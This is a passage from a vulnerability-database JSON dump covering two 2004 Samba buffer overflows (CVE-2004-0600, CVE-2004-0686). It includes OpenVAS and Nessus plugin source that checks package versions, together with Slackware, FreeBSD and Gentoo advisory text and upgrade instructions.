"2017-07-02T21:10:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-29T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52420", "href": "http://plugins.openvas.org/nasl.php?oid=52420", "type": "openvas", "title": "FreeBSD Ports: samba", "sourceData": "#\n#VID 2de14f7a-dad9-11d8-b59a-00061bc2ad93\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n samba\n ja-samba\n\nCVE-2004-0600\nBuffer overflow in the Samba Web Administration Tool (SWAT) in Samba\n3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via\nan invalid base-64 character during HTTP basic authentication.\n\nCVE-2004-0686\nBuffer overflow in Samba 2.2.x to 2.2.9, and 3.0.0 to 3.0.4, when the\n'mangling method = hash' option is enabled in smb.conf, has unknown\nimpact and attack vectors.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52420);\n script_version(\"$Revision: 4175 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-29 07:45:50 +0200 (Thu, 29 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: samba\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.samba.org/samba/whatsnew/samba-3.0.5.html\");\n script_xref(name : \"URL\" , value : \"http://www.samba.org/samba/whatsnew/samba-2.2.10.html\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/12130\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/369698\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/369706\");\n script_xref(name : \"URL\" , value : \"http://www.vuxml.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"samba\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3\")>=0 && revcomp(a:bver, b:\"3.0.5,1\")<0) {\n txt += 'Package samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.10\")<0) {\n txt += 'Package samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-samba\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.2.10.j1.0\")<0) {\n txt += 'Package ja-samba version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231053922", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231053922", "type": "openvas", "title": "Slackware Advisory SSA:2004-207-01 new samba packages", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2004_207_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.53922\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2004-207-01 new samba packages\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2004-207-01\");\n\n script_tag(name:\"insight\", value:\"New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2004-207-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i386-1\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"2.2.10-i486-1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"samba\", ver:\"3.0.5-i486-1\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "description": "New samba packages are available for Slackware 8.1, 9.0, 9.1, 10.0 and -current\nto fix security issues.\n\nMore details about these issues may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686\n\nHere are the details from the Slackware 10.0 ChangeLog:\n\nSun Jul 25 14:17:29 PDT 2004\npatches/packages/samba-3.0.5-i486-1.tgz: Upgraded to samba-3.0.5.\n This fixes a buffer overflow in SWAT and another in the code supporting\n the 'mangling method = hash' smb.conf option (which is not the default).\n For more details, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0600\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0686\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/samba-2.2.10-i386-1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/samba-2.2.10-i386-1.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/samba-2.2.10-i486-1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/samba-3.0.5-i486-1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-3.0.5-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\n03d53b165cf21bab6c0e26f98268d445 samba-2.2.10-i386-1.tgz\n\nSlackware 9.0 package:\n99cba95be5231d46327d3ca055a792db samba-2.2.10-i386-1.tgz\n\nSlackware 9.1 package:\n75e92332f92858430fbc01e0adf29c7b samba-2.2.10-i486-1.tgz\n\nSlackware 10.0 package:\nd4d00d9c748386da1dcd5ab941dbb294 samba-3.0.5-i486-1.tgz\n\nSlackware -current package:\nd4d00d9c748386da1dcd5ab941dbb294 samba-3.0.5-i486-1.tgz\n\n\nInstallation instructions:\n\nAs root, stop the samba server:\n\n. /etc/rc.d/rc.samba stop\n\nNext, upgrade the samba package(s) with upgradepkg:\n\nupgradepkg samba-3.0.5-i486-1.tgz\n\nFinally, start samba again:\n\n. /etc/rc.d/rc.samba start", "modified": "2004-07-25T20:24:19", "published": "2004-07-25T20:24:19", "id": "SSA-2004-207-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2004&m=slackware-security.407946", "type": "slackware", "title": "new samba packages", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2016-09-26T17:24:31", "description": "The following package needs to be updated: ja-samba", "edition": 1, "published": "2004-07-22T00:00:00", "type": "nessus", "title": "FreeBSD : Multiple Potential Buffer Overruns in Samba (173)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-07-22T00:00:00", "id": "FREEBSD_SAMBA_304_4.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=13656", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_2de14f7adad911d8b59a00061bc2ad93.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(13656);\n script_version(\"$Revision: 1.17 $\");\n script_cve_id(\"CVE-2004-0686\");\n script_cve_id(\"CVE-2004-0600\");\n\n script_name(english:\"FreeBSD : Multiple Potential Buffer Overruns in Samba (173)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: ja-samba');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://secunia.com/advisories/12130\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-60.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-61.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-62.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-63.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-64.html\nhttp://www.osvdb.org/8190\nhttp://www.osvdb.org/8191\nhttp://www.samba.org/samba/whatsnew/samba-2.2.10.html\nhttp://www.samba.org/samba/whatsnew/samba-3.0.5.html');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/22\");\n script_end_attributes();\n script_summary(english:\"Check for ja-samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37185 (freebsd_pkg_2de14f7adad911d8b59a00061bc2ad93.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=10;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"samba>3.*<3.0.5\");\n\npkg_test(pkg:\"samba>3.*,1<3.0.5,1\");\n\npkg_test(pkg:\"samba<2.2.10\");\n\npkg_test(pkg:\"ja-samba<2.2.10.j1.0\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-07T10:40:58", "description": "Evgeny Demidov discovered that the Samba server has a buffer overflow\nin the Samba Web Administration Tool (SWAT) on decoding Base64 data\nduring HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are\naffected.\n\nAnother buffer overflow bug has been found in the code used to support\nthe 'mangling method = hash' smb.conf option. The default setting for\nthis parameter is 'mangling method = hash2' and therefore not\nvulnerable. Versions between 2.2.0 through 2.2.9 and 3.0.0 through\n3.0.4 are affected.", "edition": 27, "published": "2009-04-23T00:00:00", "title": "FreeBSD : Multiple Potential Buffer Overruns in Samba (2de14f7a-dad9-11d8-b59a-00061bc2ad93)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-samba", "p-cpe:/a:freebsd:freebsd:samba"], "id": "FREEBSD_PKG_2DE14F7ADAD911D8B59A00061BC2AD93.NASL", "href": "https://www.tenable.com/plugins/nessus/37185", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(37185);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"Secunia\", value:\"12130\");\n\n script_name(english:\"FreeBSD : Multiple Potential Buffer Overruns in Samba (2de14f7a-dad9-11d8-b59a-00061bc2ad93)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Evgeny Demidov discovered that the Samba server has a buffer overflow\nin the Samba Web Administration Tool (SWAT) on decoding Base64 data\nduring HTTP Basic Authentication. Versions 3.0.2 through 3.0.4 are\naffected.\n\nAnother buffer overflow bug has been found in the code used to support\nthe 'mangling method = hash' smb.conf option. The default setting for\nthis parameter is 'mangling method = hash2' and therefore not\nvulnerable. Versions between 2.2.0 through 2.2.9 and 3.0.0 through\n3.0.4 are affected.\"\n );\n # http://www.securityfocus.com/archive/1/369698\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/369698\"\n );\n # http://www.securityfocus.com/archive/1/369706\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/369706\"\n );\n # http://www.samba.org/samba/whatsnew/samba-3.0.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-3.0.5.html\"\n );\n # http://www.samba.org/samba/whatsnew/samba-2.2.10.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-2.2.10.html\"\n );\n # https://vuxml.freebsd.org/freebsd/2de14f7a-dad9-11d8-b59a-00061bc2ad93.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?78bde05c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"samba>3.*<3.0.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba>3.*,1<3.0.5,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"samba<2.2.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-samba<2.2.10.j1.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:50", "description": "The remote host is affected by the vulnerability described in GLSA-200407-21\n(Samba: Multiple buffer overflows)\n\n Evgeny Demidov found a buffer overflow in SWAT, located in the base64 data\n decoder used to handle HTTP basic authentication (CAN-2004-0600). The same\n flaw is present in the code used to handle the sambaMungedDial attribute\n value, when using the ldapsam passdb backend. Another buffer overflow was\n found in the code used to support the 'mangling method = hash' smb.conf\n option (CAN-2004-0686). Note that the default Samba value for this option\n is 'mangling method = hash2' which is not vulnerable.\n \nImpact :\n\n The SWAT authentication overflow could be exploited to execute arbitrary\n code with the rights of the Samba daemon process. The overflow in the\n sambaMungedDial handling code is not thought to be exploitable. The buffer\n overflow in 'mangling method = hash' code could also be used to execute\n arbitrary code on vulnerable configurations.\n \nWorkaround :\n\n Users disabling SWAT, not using ldapsam passdb backends and not using the\n 'mangling method = hash' option are not vulnerable.", "edition": 26, "published": "2004-08-30T00:00:00", "title": "GLSA-200407-21 : Samba: Multiple buffer overflows", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0686", "CVE-2004-0600"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:samba"], "id": "GENTOO_GLSA-200407-21.NASL", "href": "https://www.tenable.com/plugins/nessus/14554", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200407-21.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14554);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0600\", \"CVE-2004-0686\");\n script_xref(name:\"GLSA\", value:\"200407-21\");\n\n script_name(english:\"GLSA-200407-21 : Samba: Multiple buffer overflows\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200407-21\n(Samba: Multiple buffer overflows)\n\n Evgeny Demidov found a buffer overflow in SWAT, located in the base64 data\n decoder used to handle HTTP basic authentication (CAN-2004-0600). The same\n flaw is present in the code used to handle the sambaMungedDial attribute\n value, when using the ldapsam passdb backend. Another buffer overflow was\n found in the code used to support the 'mangling method = hash' smb.conf\n option (CAN-2004-0686). Note that the default Samba value for this option\n is 'mangling method = hash2' which is not vulnerable.\n \nImpact :\n\n The SWAT authentication overflow could be exploited to execute arbitrary\n code with the rights of the Samba daemon process. The overflow in the\n sambaMungedDial handling code is not thought to be exploitable. The buffer\n overflow in 'mangling method = hash' code could also be used to execute\n arbitrary code on vulnerable configurations.\n \nWorkaround :\n\n Users disabling SWAT, not using ldapsam passdb backends and not using the\n 'mangling method = hash' option are not vulnerable.\"\n );\n # http://www.samba.org/samba/whatsnew/samba-3.0.5.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.samba.org/samba/history/samba-3.0.5.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200407-21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Samba users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=net-fs/samba-3.0.5'\n # emerge '>=net-fs/samba-3.0.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/07/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-fs/samba\", unaffected:make_list(\"ge 3.0.5\"), vulnerable:make_list(\"le 3.0.4-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:21", "description": "A vulnerability was discovered in SWAT, the Samba Web Administration\nTool. The routine used to decode the base64 data during HTTP basic\nauthentication is subject to a buffer overrun caused by an invalid\nbase64 character. This same code is also used to internally decode the\nsambaMungedDial attribute value when using the ldapsam passdb backend,\nand to decode input given to the ntlm_auth tool.\n\nThis vulnerability only exists in Samba versions 3.0.2 or later; the\n3.0.5 release fixes the vulnerability. Systems using SWAT, the ldapsam\npassdb backend, and tose running winbindd and allowing third- party\napplications to issue authentication requests via ntlm_auth tool\nshould upgrade immediately. 